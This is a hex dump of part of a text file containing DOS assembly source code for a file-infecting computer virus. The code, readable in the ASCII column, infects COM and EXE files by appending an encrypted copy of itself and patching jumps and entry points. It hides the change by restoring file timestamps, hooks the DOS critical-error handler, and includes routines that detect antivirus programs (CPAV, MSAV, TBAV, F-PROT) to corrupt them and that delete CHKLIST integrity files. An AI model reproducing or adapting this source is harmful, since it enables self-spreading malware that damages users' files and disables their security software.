|00002030| 69 72 73 74 20 62 79 74 | 65 20 69 73 20 27 4d 27 |irst byt|e is 'M'|
|00002040| 20 6f 72 20 27 5a 27 0a | 3b 20 20 20 20 43 68 61 | or 'Z'.|; Cha|
|00002050| 6e 67 65 73 2f 52 65 73 | 74 6f 72 65 73 20 61 74 |nges/Res|tores at|
|00002060| 74 72 69 62 75 74 65 20 | 61 6e 64 20 74 69 6d 65 |tribute |and time|
|00002070| 2f 64 61 74 65 0a 3b 0a | 3b 20 20 49 66 20 70 68 |/date.;.|; If ph|
|00002080| 69 6c 65 6e 61 6d 65 20 | 65 6e 64 73 20 69 6e 20 |ilename |ends in |
|00002090| 27 41 56 27 2c 20 27 41 | 4e 27 2c 20 6f 72 20 27 |'AV', 'A|N', or '|
|000020a0| 4f 54 27 20 69 74 27 73 | 20 6e 6f 74 20 69 6e 66 |OT' it's| not inf|
|000020b0| 65 63 74 65 64 20 61 6e | 64 20 68 61 73 20 69 74 |ected an|d has it|
|000020c0| 27 73 0a 3b 20 20 6d 69 | 6e 69 6d 75 6d 20 72 65 |'s.; mi|nimum re|
|000020d0| 71 2e 20 6d 65 6d 6f 72 | 79 20 69 6e 20 74 68 65 |q. memor|y in the|
|000020e0| 20 68 65 61 64 65 72 20 | 28 30 41 68 29 20 63 68 | header |(0Ah) ch|
|000020f0| 61 6e 67 65 64 20 74 6f | 20 46 46 46 46 68 2c 20 |anged to| FFFFh, |
|00002100| 74 68 75 73 20 6d 61 6b | 69 6e 67 20 69 74 0a 3b |thus mak|ing it.;|
|00002110| 20 20 75 6e 75 73 61 62 | 6c 65 2e 0a 3b 0a 69 6e | unusab|le..;.in|
|00002120| 66 65 63 74 5f 66 69 6c | 65 3a 0a 0a 09 6d 6f 76 |fect_fil|e:...mov|
|00002130| 09 64 69 2c 64 78 09 09 | 09 3b 20 6d 6f 76 65 20 |.di,dx..|.; move |
|00002140| 66 69 6c 65 6e 61 6d 65 | 20 70 74 72 20 69 6e 74 |filename| ptr int|
|00002150| 6f 20 61 6e 20 69 6e 64 | 65 78 20 72 65 67 0a 0a |o an ind|ex reg..|
|00002160| 09 70 75 73 68 09 64 73 | 09 09 09 3b 20 73 65 61 |.push.ds|...; sea|
|00002170| 72 63 68 20 66 6f 72 20 | 65 6e 64 20 6f 66 20 66 |rch for |end of f|
|00002180| 69 6c 65 6e 61 6d 65 28 | 4e 55 4c 4c 29 0a 09 70 |ilename(|NULL)..p|
|00002190| 6f 70 09 65 73 0a 09 78 | 6f 72 09 61 78 2c 61 78 |op.es..x|or.ax,ax|
|000021a0| 0a 09 6d 6f 76 09 63 78 | 2c 31 32 38 0a 09 72 65 |..mov.cx|,128..re|
|000021b0| 70 6e 7a 09 73 63 61 73 | 62 0a 0a 09 63 6d 70 09 |pnz.scas|b...cmp.|
|000021c0| 77 6f 72 64 20 70 74 72 | 20 5b 64 69 2d 33 5d 2c |word ptr| [di-3],|
|000021d0| 27 45 58 27 09 3b 2e 65 | 58 45 3f 0a 09 6a 7a 09 |'EX'.;.e|XE?..jz.|
|000021e0| 69 73 5f 65 78 65 63 0a | 63 68 6b 5f 63 6f 6d 3a |is_exec.|chk_com:|
|000021f0| 20 63 6d 70 09 77 6f 72 | 64 20 70 74 72 20 5b 64 | cmp.wor|d ptr [d|
|00002200| 69 2d 33 5d 2c 27 4d 4f | 27 09 3b 2e 63 4f 4d 3f |i-3],'MO|'.;.cOM?|
|00002210| 0a 09 6a 6e 7a 09 5f 72 | 65 74 0a 69 73 5f 65 78 |..jnz._r|et.is_ex|
|00002220| 65 63 3a 0a 49 46 20 4b | 49 4c 4c 5f 41 56 0a 20 |ec:.IF K|ILL_AV. |
|00002230| 20 20 20 20 20 20 20 6d | 6f 76 20 20 20 20 20 63 | m|ov c|
|00002240| 73 3a 20 69 73 61 76 2c | 30 0a 09 63 6d 70 09 77 |s: isav,|0..cmp.w|
|00002250| 6f 72 64 20 70 74 72 20 | 5b 64 69 2d 37 5d 2c 27 |ord ptr |[di-7],'|
|00002260| 56 41 27 09 3b 2a 41 56 | 2e 2a 3f 20 43 50 41 56 |VA'.;*AV|.*? CPAV|
|00002270| 2c 4d 53 41 56 2c 54 42 | 41 56 2c 54 4e 54 41 56 |,MSAV,TB|AV,TNTAV|
|00002280| 0a 09 6a 7a 09 61 6e 74 | 69 5f 61 63 74 69 6f 6e |..jz.ant|i_action|
|00002290| 0a 09 63 6d 70 09 77 6f | 72 64 20 70 74 72 20 5b |..cmp.wo|rd ptr [|
|000022a0| 64 69 2d 37 5d 2c 27 54 | 4f 27 09 3b 2a 4f 54 2e |di-7],'T|O'.;*OT.|
|000022b0| 2a 3f 20 46 2d 50 52 4f | 54 0a 09 6a 7a 09 61 6e |*? F-PRO|T..jz.an|
|000022c0| 74 69 5f 61 63 74 69 6f | 6e 0a 09 63 6d 70 09 77 |ti_actio|n..cmp.w|
|000022d0| 6f 72 64 20 70 74 72 20 | 5b 64 69 2d 37 5d 2c 27 |ord ptr |[di-7],'|
|000022e0| 4e 41 27 09 3b 2a 41 4e | 2e 2a 3f 0a 09 6a 6e 7a |NA'.;*AN|.*?..jnz|
|000022f0| 09 6e 61 6d 65 5f 6f 6b | 0a 09 63 6d 70 09 77 6f |.name_ok|..cmp.wo|
|00002300| 72 64 20 70 74 72 20 5b | 64 69 2d 39 5d 2c 27 43 |rd ptr [|di-9],'C|
|00002310| 53 27 09 3b 2a 53 43 41 | 4e 2e 2a 3f 0a 09 6a 6e |S'.;*SCA|N.*?..jn|
|00002320| 7a 09 6e 61 6d 65 5f 6f | 6b 0a 61 6e 74 69 5f 61 |z.name_o|k.anti_a|
|00002330| 63 74 69 6f 6e 3a 0a 09 | 69 6e 63 09 63 73 3a 20 |ction:..|inc.cs: |
|00002340| 69 73 61 76 09 09 3b 20 | 73 65 74 20 6d 61 72 6b |isav..; |set mark|
|00002350| 20 66 6f 72 20 61 6e 74 | 69 2d 76 69 72 75 73 20 | for ant|i-virus |
|00002360| 6b 69 6c 6c 0a 6e 61 6d | 65 5f 6f 6b 3a 0a 45 4e |kill.nam|e_ok:.EN|
|00002370| 44 49 46 0a 09 70 75 73 | 68 09 64 73 09 09 09 3b |DIF..pus|h.ds...;|
|00002380| 20 73 61 76 65 20 66 6e | 61 6d 65 20 70 74 72 20 | save fn|ame ptr |
|00002390| 73 65 67 6d 65 6e 74 0a | 09 6d 6f 76 09 65 73 2c |segment.|.mov.es,|
|000023a0| 61 78 09 09 09 3b 20 4e | 55 4c 4c 20 45 53 20 20 |ax...; N|ULL ES |
|000023b0| 28 61 78 20 61 6c 72 65 | 61 64 79 20 30 29 0a 09 |(ax alre|ady 0)..|
|000023c0| 6c 64 73 09 61 78 2c 65 | 73 3a 20 5b 32 34 68 2a |lds.ax,e|s: [24h*|
|000023d0| 34 5d 09 09 3b 20 67 65 | 74 20 49 4e 54 20 32 34 |4]..; ge|t INT 24|
|000023e0| 68 20 76 65 63 74 6f 72 | 0a 09 6d 6f 76 09 6f 6c |h vector|..mov.ol|
|000023f0| 64 5f 32 34 5f 6f 66 66 | 2c 61 78 09 09 3b 20 73 |d_24_off|,ax..; s|
|00002400| 61 76 65 20 69 74 0a 09 | 6d 6f 76 09 6f 6c 64 5f |ave it..|mov.old_|
|00002410| 32 34 5f 73 65 67 2c 64 | 73 0a 09 6d 6f 76 09 65 |24_seg,d|s..mov.e|
|00002420| 73 3a 20 5b 32 34 68 2a | 34 2b 32 5d 2c 63 73 09 |s: [24h*|4+2],cs.|
|00002430| 3b 20 69 6e 73 74 61 6c | 6c 20 6f 75 72 20 68 61 |; instal|l our ha|
|00002440| 6e 64 6c 65 72 0a 09 6d | 6f 76 09 65 73 3a 20 5b |ndler..m|ov.es: [|
|00002450| 32 34 68 2a 34 5d 2c 6f | 66 66 73 65 74 20 6e 65 |24h*4],o|ffset ne|
|00002460| 77 5f 32 34 0a 09 70 6f | 70 09 64 73 09 09 09 3b |w_24..po|p.ds...;|
|00002470| 20 72 65 73 74 6f 72 65 | 20 66 6e 61 6d 65 20 70 | restore| fname p|
|00002480| 74 72 20 73 65 67 6d 65 | 6e 74 0a 09 70 75 73 68 |tr segme|nt..push|
|00002490| 09 65 73 0a 09 70 75 73 | 68 09 63 73 09 09 09 3b |.es..pus|h.cs...;|
|000024a0| 20 70 75 73 68 20 45 53 | 20 66 6f 72 20 72 65 73 | push ES| for res|
|000024b0| 74 6f 72 69 6e 67 20 49 | 4e 54 32 34 68 20 6c 61 |toring I|NT24h la|
|000024c0| 74 65 72 0a 09 70 6f 70 | 09 65 73 09 09 09 3b 20 |ter..pop|.es...; |
|000024d0| 45 53 3d 43 53 0a 0a 09 | 6d 6f 76 09 61 78 2c 34 |ES=CS...|mov.ax,4|
|000024e0| 33 30 30 68 09 09 3b 20 | 67 65 74 20 70 68 69 6c |300h..; |get phil|
|000024f0| 65 20 61 74 74 72 69 62 | 75 74 65 0a 09 69 6e 74 |e attrib|ute..int|
|00002500| 09 32 31 68 0a 09 6d 6f | 76 09 61 78 2c 34 33 30 |.21h..mo|v.ax,430|
|00002510| 31 68 09 09 3b 20 6e 75 | 6c 6c 20 61 74 74 72 69 |1h..; nu|ll attri|
|00002520| 62 73 20 34 33 30 31 68 | 0a 09 70 75 73 68 09 61 |bs 4301h|..push.a|
|00002530| 78 20 63 78 20 64 73 20 | 64 78 09 09 3b 20 73 61 |x cx ds |dx..; sa|
|00002540| 76 65 20 41 58 2d 63 61 | 6c 6c 2f 43 58 2d 61 74 |ve AX-ca|ll/CX-at|
|00002550| 74 72 69 62 2f 44 58 3a | 44 53 0a 09 78 6f 72 09 |trib/DX:|DS..xor.|
|00002560| 63 78 2c 63 78 09 09 09 | 3b 20 7a 65 72 6f 20 61 |cx,cx...|; zero a|
|00002570| 6c 6c 0a 09 69 6e 74 09 | 32 31 68 0a 0a 09 6d 6f |ll..int.|21h...mo|
|00002580| 76 09 62 78 2c 73 69 67 | 6e 61 6c 0a 09 6d 6f 76 |v.bx,sig|nal..mov|
|00002590| 09 61 78 2c 33 64 30 32 | 68 09 09 3b 20 6f 70 65 |.ax,3d02|h..; ope|
|000025a0| 6e 20 74 68 65 20 66 69 | 6c 65 0a 09 69 6e 74 09 |n the fi|le..int.|
|000025b0| 32 31 68 0a 09 6a 63 09 | 63 6c 6f 73 65 09 09 09 |21h..jc.|close...|
|000025c0| 3b 20 69 66 20 65 72 72 | 6f 72 2e 2e 71 75 69 74 |; if err|or..quit|
|000025d0| 20 69 6e 66 65 63 74 69 | 6f 6e 0a 0a 09 78 63 68 | infecti|on...xch|
|000025e0| 67 09 62 78 2c 61 78 09 | 09 09 3b 20 67 65 74 20 |g.bx,ax.|..; get |
|000025f0| 68 61 6e 64 6c 65 0a 0a | 09 70 75 73 68 09 63 73 |handle..|.push.cs|
|00002600| 09 09 09 3b 20 44 53 3d | 43 53 0a 09 70 6f 70 09 |...; DS=|CS..pop.|
|00002610| 64 73 0a 0a 49 46 20 4b | 49 4c 4c 5f 43 48 4b 4c |ds..IF K|ILL_CHKL|
|00002620| 49 53 54 0a 20 20 20 20 | 20 20 20 20 63 61 6c 6c |IST. | call|
|00002630| 20 20 20 20 6b 69 6c 6c | 5f 63 68 6b 6c 73 74 20 | kill|_chklst |
|00002640| 20 20 20 20 20 20 20 20 | 20 20 20 20 3b 20 6b 69 | | ; ki|
|00002650| 6c 6c 20 43 48 4b 4c 49 | 53 54 2e 4d 53 20 26 20 |ll CHKLI|ST.MS & |
|00002660| 2e 43 50 53 20 66 69 6c | 65 7a 0a 45 4e 44 49 46 |.CPS fil|ez.ENDIF|
|00002670| 0a 09 6d 6f 76 09 61 78 | 2c 35 37 30 30 68 09 09 |..mov.ax|,5700h..|
|00002680| 3b 20 67 65 74 20 66 69 | 6c 65 20 74 69 6d 65 2f |; get fi|le time/|
|00002690| 64 61 74 65 0a 09 69 6e | 74 09 32 31 68 0a 09 70 |date..in|t.21h..p|
|000026a0| 75 73 68 09 63 78 20 64 | 78 09 09 09 3b 20 73 61 |ush.cx d|x...; sa|
|000026b0| 76 65 20 27 65 6d 20 66 | 6f 72 20 6c 61 74 65 72 |ve 'em f|or later|
|000026c0| 0a 0a 09 6d 6f 76 09 61 | 68 2c 33 66 68 09 09 09 |...mov.a|h,3fh...|
|000026d0| 3b 20 52 65 61 64 20 66 | 69 72 73 74 20 62 79 74 |; Read f|irst byt|
|000026e0| 65 73 20 6f 66 20 66 69 | 6c 65 0a 09 6d 6f 76 09 |es of fi|le..mov.|
|000026f0| 63 78 2c 31 38 68 09 09 | 09 3b 20 45 58 45 20 68 |cx,18h..|.; EXE h|
|00002700| 65 61 64 65 72 20 6f 72 | 20 6a 75 73 74 20 66 69 |eader or| just fi|
|00002710| 72 73 74 20 62 79 74 65 | 73 20 6f 66 20 43 4f 4d |rst byte|s of COM|
|00002720| 0a 09 6c 65 61 09 64 78 | 2c 6f 72 67 5f 62 79 74 |..lea.dx|,org_byt|
|00002730| 65 73 09 09 3b 20 62 75 | 66 66 65 72 20 75 73 65 |es..; bu|ffer use|
|00002740| 64 20 66 6f 72 20 62 6f | 74 68 0a 09 69 6e 74 09 |d for bo|th..int.|
|00002750| 32 31 68 0a 0a 09 63 61 | 6c 6c 09 6f 66 66 73 65 |21h...ca|ll.offse|
|00002760| 74 5f 65 6e 64 09 09 3b | 20 73 65 74 20 70 74 72 |t_end..;| set ptr|
|00002770| 20 74 6f 20 65 6e 64 2d | 20 44 58 41 58 3d 66 69 | to end-| DXAX=fi|
|00002780| 6c 65 5f 73 69 7a 65 0a | 0a 09 63 6d 70 09 62 79 |le_size.|..cmp.by|
|00002790| 74 65 20 70 74 72 20 6f | 72 67 5f 62 79 74 65 73 |te ptr o|rg_bytes|
|000027a0| 2c 27 4d 27 09 3b 20 45 | 58 45 3f 0a 09 6a 7a 09 |,'M'.; E|XE?..jz.|
|000027b0| 64 6f 5f 65 78 65 0a 09 | 63 6d 70 09 62 79 74 65 |do_exe..|cmp.byte|
|000027c0| 20 70 74 72 20 6f 72 67 | 5f 62 79 74 65 73 2c 27 | ptr org|_bytes,'|
|000027d0| 5a 27 09 3b 20 45 58 45 | 3f 0a 09 6a 7a 09 64 6f |Z'.; EXE|?..jz.do|
|000027e0| 5f 65 78 65 0a 09 63 6d | 70 09 62 79 74 65 20 70 |_exe..cm|p.byte p|
|000027f0| 74 72 20 6f 72 67 5f 62 | 79 74 65 73 2b 33 2c 30 |tr org_b|ytes+3,0|
|00002800| 09 3b 20 43 6f 4d 20 69 | 6e 66 65 63 74 65 64 3f |.; CoM i|nfected?|
|00002810| 0a 09 6a 7a 09 64 5f 74 | 69 6d 65 0a 0a 09 64 65 |..jz.d_t|ime...de|
|00002820| 63 09 65 78 65 5f 70 68 | 69 6c 65 0a 0a 09 70 75 |c.exe_ph|ile...pu|
|00002830| 73 68 09 61 78 09 09 09 | 3b 20 73 61 76 65 20 66 |sh.ax...|; save f|
|00002840| 69 6c 65 20 73 69 7a 65 | 0a 09 61 64 64 09 61 78 |ile size|..add.ax|
|00002850| 2c 31 30 30 68 09 09 09 | 3b 20 50 53 50 20 69 6e |,100h...|; PSP in|
|00002860| 20 63 6f 6d 0a 09 6d 6f | 76 09 72 65 6c 5f 6f 66 | com..mo|v.rel_of|
|00002870| 66 2c 61 78 09 09 3b 20 | 73 61 76 65 20 69 74 20 |f,ax..; |save it |
|00002880| 66 6f 72 20 64 65 63 72 | 79 70 74 6f 72 0a 09 6d |for decr|yptor..m|
|00002890| 6f 76 09 62 70 5f 63 61 | 6c 63 2c 61 78 0a 0a 09 |ov.bp_ca|lc,ax...|
|000028a0| 63 61 6c 6c 09 65 6e 63 | 72 79 70 74 5f 63 6f 64 |call.enc|rypt_cod|
|000028b0| 65 09 09 3b 20 63 6f 70 | 79 20 61 6e 64 20 65 6e |e..; cop|y and en|
|000028c0| 63 72 79 70 74 20 63 6f | 64 65 0a 0a 09 6c 65 61 |crypt co|de...lea|
|000028d0| 09 64 78 2c 76 65 6e 64 | 09 09 09 3b 20 73 74 61 |.dx,vend|...; sta|
|000028e0| 72 74 20 6f 66 20 6e 65 | 77 6c 79 20 63 72 65 61 |rt of ne|wly crea|
|000028f0| 74 65 64 20 63 6f 64 65 | 0a 09 6d 6f 76 09 63 78 |ted code|..mov.cx|
|00002900| 2c 6f 66 66 73 65 74 20 | 68 65 61 70 2b 30 46 46 |,offset |heap+0FF|
|00002910| 68 09 3b 20 76 69 72 75 | 73 20 6c 65 6e 67 74 68 |h.; viru|s length|
|00002920| 2b 78 74 72 61 0a 09 61 | 64 64 09 63 6c 2c 73 69 |+xtra..a|dd.cl,si|
|00002930| 7a 65 5f 64 69 73 70 09 | 09 3b 20 61 64 64 20 72 |ze_disp.|.; add r|
|00002940| 61 6e 64 6f 6d 20 20 5e | 69 6e 20 63 61 73 65 20 |andom ^|in case |
|00002950| 63 6c 20 65 78 63 65 65 | 64 73 20 46 46 0a 09 6d |cl excee|ds FF..m|
|00002960| 6f 76 09 61 68 2c 34 30 | 68 0a 09 69 6e 74 09 32 |ov.ah,40|h..int.2|
|00002970| 31 68 09 09 09 3b 20 61 | 70 70 65 6e 64 20 76 69 |1h...; a|ppend vi|
|00002980| 72 75 73 20 74 6f 20 69 | 6e 66 65 63 74 65 64 20 |rus to i|nfected |
|00002990| 66 69 6c 65 0a 0a 09 63 | 61 6c 6c 09 6f 66 66 73 |file...c|all.offs|
|000029a0| 65 74 5f 7a 65 72 6f 09 | 09 3b 20 70 6f 73 69 74 |et_zero.|.; posit|
|000029b0| 69 6f 6e 20 70 74 72 20 | 74 6f 20 62 65 67 69 6e |ion ptr |to begin|
|000029c0| 6e 69 6e 67 20 6f 66 20 | 66 69 6c 65 0a 0a 09 70 |ning of |file...p|
|000029d0| 6f 70 09 61 78 09 09 09 | 3b 20 72 65 73 74 6f 72 |op.ax...|; restor|
|000029e0| 65 20 43 4f 4d 20 66 69 | 6c 65 20 73 69 7a 65 0a |e COM fi|le size.|
|000029f0| 09 73 75 62 09 61 78 2c | 33 09 09 09 3b 20 63 61 |.sub.ax,|3...; ca|
|00002a00| 6c 63 75 6c 61 74 65 20 | 6a 6d 70 20 6f 66 66 73 |lculate |jmp offs|
|00002a10| 65 74 0a 09 6d 6f 76 09 | 77 6f 72 64 20 70 74 72 |et..mov.|word ptr|
|00002a20| 20 6e 65 77 5f 6a 6d 70 | 2b 31 2c 61 78 09 3b 20 | new_jmp|+1,ax.; |
|00002a30| 73 61 76 65 20 69 74 2e | 2e 0a 0a 09 6c 65 61 09 |save it.|....lea.|
|00002a40| 64 78 2c 6e 65 77 5f 6a | 6d 70 09 09 3b 20 77 72 |dx,new_j|mp..; wr|
|00002a50| 69 74 65 20 74 68 65 20 | 6e 65 77 20 6a 6d 70 20 |ite the |new jmp |
|00002a60| 28 45 39 58 58 58 58 2c | 30 29 0a 09 6d 6f 76 09 |(E9XXXX,|0)..mov.|
|00002a70| 63 78 2c 34 09 09 09 3b | 20 74 6f 74 61 6c 20 6f |cx,4...;| total o|
|00002a80| 66 20 34 20 62 79 74 65 | 73 0a 09 6d 6f 76 09 61 |f 4 byte|s..mov.a|
|00002a90| 68 2c 34 30 68 0a 09 69 | 6e 74 09 32 31 68 0a 0a |h,40h..i|nt.21h..|
|00002aa0| 64 5f 74 69 6d 65 3a 0a | 0a 09 70 6f 70 09 64 78 |d_time:.|..pop.dx|
|00002ab0| 20 63 78 09 09 09 3b 20 | 70 6f 70 20 64 61 74 65 | cx...; |pop date|
|00002ac0| 2f 74 69 6d 65 0a 09 6d | 6f 76 09 61 78 2c 35 37 |/time..m|ov.ax,57|
|00002ad0| 30 31 68 09 09 3b 20 72 | 65 73 74 6f 72 65 20 74 |01h..; r|estore t|
|00002ae0| 68 65 20 6d 6f 74 68 65 | 72 20 66 75 63 6b 65 72 |he mothe|r fucker|
|00002af0| 73 0a 09 69 6e 74 09 32 | 31 68 0a 0a 63 6c 6f 73 |s..int.2|1h..clos|
|00002b00| 65 3a 0a 0a 09 6d 6f 76 | 09 61 68 2c 33 65 68 09 |e:...mov|.ah,3eh.|
|00002b10| 09 09 3b 20 63 6c 6f 73 | 65 20 70 68 69 6c 65 0a |..; clos|e phile.|
|00002b20| 09 69 6e 74 09 32 31 68 | 0a 0a 09 70 6f 70 09 64 |.int.21h|...pop.d|
|00002b30| 78 20 64 73 20 63 78 20 | 61 78 09 09 3b 20 72 65 |x ds cx |ax..; re|
|00002b40| 73 74 6f 72 65 20 61 74 | 74 72 69 62 0a 09 69 6e |store at|trib..in|
|00002b50| 74 09 32 31 68 0a 0a 64 | 6f 6e 74 5f 64 6f 3a 0a |t.21h..d|ont_do:.|
|00002b60| 09 70 6f 70 09 65 73 09 | 09 09 3b 20 45 53 3d 30 |.pop.es.|..; ES=0|
|00002b70| 0a 09 6c 64 73 09 61 78 | 2c 64 77 6f 72 64 20 70 |..lds.ax|,dword p|
|00002b80| 74 72 20 6f 6c 64 5f 32 | 34 5f 6f 66 66 09 3b 20 |tr old_2|4_off.; |
|00002b90| 72 65 73 74 6f 72 65 20 | 73 68 69 74 74 79 20 44 |restore |shitty D|
|00002ba0| 4f 53 20 65 72 72 6f 72 | 20 68 61 6e 64 6c 65 72 |OS error| handler|
|00002bb0| 0a 09 6d 6f 76 09 65 73 | 3a 20 5b 32 34 68 2a 34 |..mov.es|: [24h*4|
|00002bc0| 5d 2c 61 78 0a 09 6d 6f | 76 09 65 73 3a 20 5b 32 |],ax..mo|v.es: [2|
|00002bd0| 34 68 2a 34 2b 32 5d 2c | 64 73 0a 0a 09 72 65 74 |4h*4+2],|ds...ret|
|00002be0| 09 09 09 09 3b 20 72 65 | 74 75 72 6e 20 62 61 63 |....; re|turn bac|
|00002bf0| 6b 20 74 6f 20 49 4e 54 | 20 32 31 68 20 68 61 6e |k to INT| 21h han|
|00002c00| 64 6c 65 72 0a 0a 64 6f | 5f 65 78 65 3a 0a 09 63 |dler..do|_exe:..c|
|00002c10| 6d 70 09 64 78 2c 6d 61 | 78 5f 65 78 65 0a 09 6a |mp.dx,ma|x_exe..j|
|00002c20| 67 09 64 5f 74 69 6d 65 | 0a 0a 09 6d 6f 76 09 65 |g.d_time|...mov.e|
|00002c30| 78 65 5f 70 68 69 6c 65 | 2c 31 0a 0a 49 46 20 4b |xe_phile|,1..IF K|
|00002c40| 49 4c 4c 5f 41 56 0a 20 | 20 20 20 20 20 20 20 63 |ILL_AV. | c|
|00002c50| 6d 70 20 20 20 20 20 69 | 73 61 76 2c 31 20 20 20 |mp i|sav,1 |
|00002c60| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 3b | | ;|
|00002c70| 20 61 6e 74 69 2d 76 69 | 72 75 73 20 73 6f 66 74 | anti-vi|rus soft|
|00002c80| 77 61 72 65 3f 0a 09 6a | 6e 7a 09 6e 6f 74 5f 61 |ware?..j|nz.not_a|
|00002c90| 76 0a 09 6d 6f 76 09 77 | 6f 72 64 20 70 74 72 20 |v..mov.w|ord ptr |
|00002ca0| 65 78 65 5f 68 65 61 64 | 65 72 5b 30 61 68 5d 2c |exe_head|er[0ah],|
|00002cb0| 30 46 46 46 46 68 20 3b | 20 63 68 61 6e 67 65 20 |0FFFFh ;| change |
|00002cc0| 6d 69 6e 2e 20 6d 65 6d | 20 74 6f 20 46 46 46 46 |min. mem| to FFFF|
|00002cd0| 68 0a 09 6a 6d 70 09 77 | 72 69 74 65 5f 68 64 72 |h..jmp.w|rite_hdr|
|00002ce0| 0a 6e 6f 74 5f 61 76 3a | 0a 45 4e 44 49 46 0a 09 |.not_av:|.ENDIF..|
|00002cf0| 63 6d 70 09 77 6f 72 64 | 20 70 74 72 20 65 78 65 |cmp.word| ptr exe|
|00002d00| 5f 68 65 61 64 65 72 5b | 31 32 68 5d 2c 30 20 3b |_header[|12h],0 ;|
|00002d10| 20 63 68 65 63 6b 73 75 | 6d 20 30 3f 0a 09 6a 6e | checksu|m 0?..jn|
|00002d20| 7a 09 64 5f 74 69 6d 65 | 0a 0a 09 6d 6f 76 09 63 |z.d_time|...mov.c|
|00002d30| 78 2c 6d 65 6d 5f 77 6f | 72 64 09 09 3b 20 67 65 |x,mem_wo|rd..; ge|
|00002d40| 74 20 72 61 6e 64 6f 6d | 20 77 6f 72 64 0a 09 69 |t random| word..i|
|00002d50| 6e 63 09 63 78 09 09 09 | 3b 20 6d 61 6b 65 20 73 |nc.cx...|; make s|
|00002d60| 75 72 65 20 21 30 0a 09 | 6d 6f 76 09 77 6f 72 64 |ure !0..|mov.word|
|00002d70| 20 70 74 72 20 65 78 65 | 5f 68 65 61 64 65 72 5b | ptr exe|_header[|
|00002d80| 31 32 68 5d 2c 63 78 20 | 3b 20 73 65 74 20 63 68 |12h],cx |; set ch|
|00002d90| 65 63 6b 73 75 6d 20 74 | 6f 21 30 0a 09 6d 6f 76 |ecksum t|o!0..mov|
|00002da0| 09 63 78 2c 77 6f 72 64 | 20 70 74 72 20 65 78 65 |.cx,word| ptr exe|
|00002db0| 5f 68 65 61 64 65 72 5b | 31 30 68 5d 20 3b 20 67 |_header[|10h] ; g|
|00002dc0| 65 74 20 6f 6c 64 20 53 | 50 0a 09 6d 6f 76 09 6f |et old S|P..mov.o|
|00002dd0| 6c 64 73 70 2c 63 78 09 | 09 3b 20 73 61 76 65 20 |ldsp,cx.|.; save |
|00002de0| 69 74 2e 2e 0a 09 6d 6f | 76 09 77 6f 72 64 20 70 |it....mo|v.word p|
|00002df0| 74 72 20 65 78 65 5f 68 | 65 61 64 65 72 5b 31 30 |tr exe_h|eader[10|
|00002e00| 68 5d 2c 30 20 3b 20 77 | 72 69 74 65 20 6e 65 77 |h],0 ; w|rite new|
|00002e10| 20 53 50 20 6f 66 20 30 | 0a 0a 09 6c 65 73 09 63 | SP of 0|...les.c|
|00002e20| 78 2c 64 77 6f 72 64 20 | 70 74 72 20 65 78 65 5f |x,dword |ptr exe_|
|00002e30| 68 65 61 64 65 72 5b 31 | 34 68 5d 20 3b 20 53 61 |header[1|4h] ; Sa|
|00002e40| 76 65 20 6f 6c 64 20 65 | 6e 74 72 79 20 70 6f 69 |ve old e|ntry poi|
|00002e50| 6e 74 0a 09 6d 6f 76 09 | 77 6f 72 64 20 70 74 72 |nt..mov.|word ptr|
|00002e60| 20 65 78 65 5f 6a 75 6d | 70 2c 20 63 78 09 3b 20 | exe_jum|p, cx.; |
|00002e70| 6f 66 66 0a 09 6d 6f 76 | 09 77 6f 72 64 20 70 74 |off..mov|.word pt|
|00002e80| 72 20 65 78 65 5f 6a 75 | 6d 70 5b 32 5d 2c 20 65 |r exe_ju|mp[2], e|
|00002e90| 73 20 3b 20 73 65 67 0a | 0a 09 70 75 73 68 09 63 |s ; seg.|..push.c|
|00002ea0| 73 09 09 09 3b 20 45 53 | 3d 43 53 0a 09 70 6f 70 |s...; ES|=CS..pop|
|00002eb0| 09 65 73 0a 0a 09 70 75 | 73 68 09 64 78 20 61 78 |.es...pu|sh.dx ax|
|00002ec0| 09 09 09 3b 20 73 61 76 | 65 20 66 69 6c 65 20 73 |...; sav|e file s|
|00002ed0| 69 7a 65 20 44 58 3a 41 | 58 0a 09 63 6d 70 09 62 |ize DX:A|X..cmp.b|
|00002ee0| 79 74 65 20 70 74 72 20 | 65 78 65 5f 68 65 61 64 |yte ptr |exe_head|
|00002ef0| 65 72 5b 31 38 68 5d 2c | 35 32 68 20 3b 20 50 4b |er[18h],|52h ; PK|
|00002f00| 4c 49 54 45 27 64 3f 20 | 28 76 31 2e 31 33 2b 29 |LITE'd? |(v1.13+)|
|00002f10| 0a 09 6a 7a 09 70 6b 6c | 69 74 65 64 0a 09 63 6d |..jz.pkl|ited..cm|
|00002f20| 70 09 62 79 74 65 20 70 | 74 72 20 65 78 65 5f 68 |p.byte p|tr exe_h|
|00002f30| 65 61 64 65 72 5b 31 38 | 68 5d 2c 34 30 68 20 3b |eader[18|h],40h ;|
|00002f40| 20 34 30 2b 20 3d 20 6e | 65 77 20 66 6f 72 6d 61 | 40+ = n|ew forma|
|00002f50| 74 20 45 58 45 0a 09 6a | 67 65 09 64 5f 74 69 6d |t EXE..j|ge.d_tim|
|00002f60| 65 0a 09 70 6b 6c 69 74 | 65 64 3a 0a 0a 09 6d 6f |e..pklit|ed:...mo|
|00002f70| 76 09 62 70 2c 20 77 6f | 72 64 20 70 74 72 20 65 |v.bp, wo|rd ptr e|
|00002f80| 78 65 5f 68 65 61 64 65 | 72 2b 38 68 20 3b 20 63 |xe_heade|r+8h ; c|
|00002f90| 61 6c 63 2e 20 6e 65 77 | 20 65 6e 74 72 79 20 70 |alc. new| entry p|
|00002fa0| 6f 69 6e 74 0a 09 6d 6f | 76 09 63 6c 2c 34 09 09 |oint..mo|v.cl,4..|
|00002fb0| 09 3b 20 2a 31 30 68 0a | 09 73 68 6c 09 62 70 2c |.; *10h.|.shl.bp,|
|00002fc0| 63 6c 09 09 09 3b 20 20 | 5e 62 79 20 73 68 69 66 |cl...; |^by shif|
|00002fd0| 74 69 6e 67 20 6f 6e 65 | 20 62 79 74 65 0a 09 73 |ting one| byte..s|
|00002fe0| 75 62 09 61 78 2c 62 70 | 09 09 09 3b 20 67 65 74 |ub.ax,bp|...; get|
|00002ff0| 20 61 63 74 75 61 6c 20 | 66 69 6c 65 20 73 69 7a | actual |file siz|
|00003000| 65 2d 68 65 61 64 65 72 | 0a 09 73 62 62 09 64 78 |e-header|..sbb.dx|
|00003010| 2c 30 0a 09 6d 6f 76 09 | 63 78 2c 31 30 68 09 09 |,0..mov.|cx,10h..|
|00003020| 09 3b 20 64 69 76 69 64 | 65 20 6d 65 20 62 61 62 |.; divid|e me bab|
